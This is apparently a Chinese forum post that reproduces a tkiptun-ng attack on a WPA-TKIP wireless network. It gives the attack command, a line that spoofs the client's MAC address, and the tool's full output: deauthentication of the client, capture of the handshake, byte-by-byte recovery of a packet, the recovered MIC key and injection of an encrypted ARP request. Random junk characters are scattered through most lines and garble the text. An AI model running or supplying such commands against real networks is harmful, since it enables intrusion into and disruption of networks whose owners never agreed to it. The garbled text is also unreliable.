中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入 t) L* H% a5 Y h: e! X# N
0 w+ y6 G$ r' }
, ]) |8 D5 f1 t tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0 * `1 w* _' d' e( v5 i
# P8 V# m' G) \5 i* f6 L8 b7 p3 R1 aOutput: 输出- D$ |# P" ~' _
: u2 Z' ]0 V, _5 b7 T3 H$ p The interface MAC (00:0E:2E:C5:81 3) doesn't match the specified MAC (-h).. x$ i' b _8 B$ L/ }8 A7 p
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
2 y1 G, ^; k# g+ z( Z2 K* F Blub 2:38 E6 38 1C 24 15 1C CF + a- N5 z8 x* m; @3 b5 H
Blub 1:17 DD 0D 69 1D C3 1F EE & f4 `1 g# l0 t; |1 I
Blub 3:29 31 79 E7 E6 CF 8D 5E - A, a/ V4 c4 P3 f8 Y" O% _+ Q
15:06:48 Michael Test: Successful
9 l+ `: j4 w5 ]: P9 d! B3 D 15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
1 w5 C0 H( L B2 D 15:06:48 Found specified AP2 ~$ @. V7 C" o4 n( L7 V
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
+ @( `3 M: _# x( | 15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]0 c8 c: N5 ~) ]- q3 ^
15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured/ W# j3 S2 Z( i @3 }
15:06:56 Waiting for an ARP packet coming from the Client...+ M6 g( \6 l0 i" p! p+ g' x
Saving chosen packet in replay_src-0305-150705.cap
# z- c- p, f* N6 Y: `' c 15:07:05 Waiting for an ARP response packet coming from the AP...
9 z$ _3 y. x7 v Saving chosen packet in replay_src-0305-150705.cap
" |4 G( |4 B1 `7 v 15:07:05 Got the answer!$ s m3 Q- { P) P
15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering." J& L; V/ o) o0 `% M' o
; T" y0 N% ?* v. u0 p, k; o6 x
15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms4 J4 H' `7 M; l$ D) h: O& m
15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms
* I, h7 a4 i) D4 o: h 15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms
& h/ m. j1 Q) I/ d 15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms/ @! t: D& ~4 Q+ C$ X- A4 K! ]+ a
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms# P0 W' T, u9 o2 V" @& [0 _
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
( P: O3 e2 V3 ]( |, O4 b) ? 15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms& O$ E' z: |5 D0 A2 t5 {9 p
15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms0 w: T' O- d' C
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down./ U" X& ?5 W% l0 c3 u) m0 ?; G+ S
15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms
+ r4 A6 f4 v c1 i0 ]4 S1 j2 l+ q 15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms
0 w9 q" J1 Y8 J5 s9 ~ Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
. x# @6 K% N8 w4 e 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
b0 g7 k5 U; A( E" F7 p: \8 }! ^ Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.5 {9 H4 R' u2 N' F6 r
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.. u3 N, M& J8 P; U1 F
15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms
# p! ^+ I& b" @ f8 Y 15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms
% I, ]) [5 t: `" }) W% E8 m7 G 15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
' h! M u% M5 g X: Q) ]9 Z4 h4 p 15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms% h: t o) s1 N
15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms: E, a$ f% q) x) L5 a% `% S! q
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms
% N% S. |( g# |$ k 15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms4 E6 }8 D0 Q! n. M% \5 `
15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
7 C# e1 u) P5 V2 k, x) \6 C y, f! X 15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms
& L Q! e9 w7 l, C 15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms9 F" b5 U. ?5 c$ H
15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms2 D3 P/ C) G6 _% D! o/ m
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. ^4 B9 j" c7 G9 R$ @% _' k$ }: A C
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms @* l* \3 N1 I7 J) L) R
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
/ i- z4 Y; ^/ w4 P2 c9 _8 H; o 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms, X6 A7 ]2 Y3 k
15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms
+ R: B, o& I* q% ? Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.3 \( l$ _( W& e" y4 C! ^
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms
0 M1 d+ e$ z; G3 Y4 | 15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
) E* @. V3 i& ?9 |! n2 J# a 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms8 S3 o# P9 d5 `! r9 L
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
* k8 J8 {. a6 ^ B; h1 X0 ] 15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms! w6 O7 K. M8 m- X/ @( b: k
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
* ~5 D/ ?7 ?6 y. N/ n3 |6 W Sleeping for 60 seconds.36 bytes still unknown
! q, Y% ~9 E) A+ S2 }$ i ARP Reply2 _6 Z$ [, O# X1 G
Checking 192.168.x.y
% k8 p$ k, N5 I& ]% o 15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:664 K) W! I: x. y, j
# [" T9 c8 a3 C; D* F0 i
Saving plaintext in replay_dec-0305-155411.cap
1 H. I8 A% n- g Saving keystream in replay_dec-0305-155411.xor
! O% x7 o0 Q6 g Z" X 15:54:11
9 j8 [& q3 W! Z. F Completed in 2816s (0.02 bytes/s)
G. c: M/ Y ^6 L% b2 j) O
& p! M! p% V% A' F! \! P4 q 15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
: o, R4 O$ D7 e) S3 ?& h; W9 C 15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.1121 l2 k l4 o! Q" _
15:54:11 Sent encrypted tkip ARP request to the client.' p1 }& K) t @. B7 Q2 ]; u) ^
15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|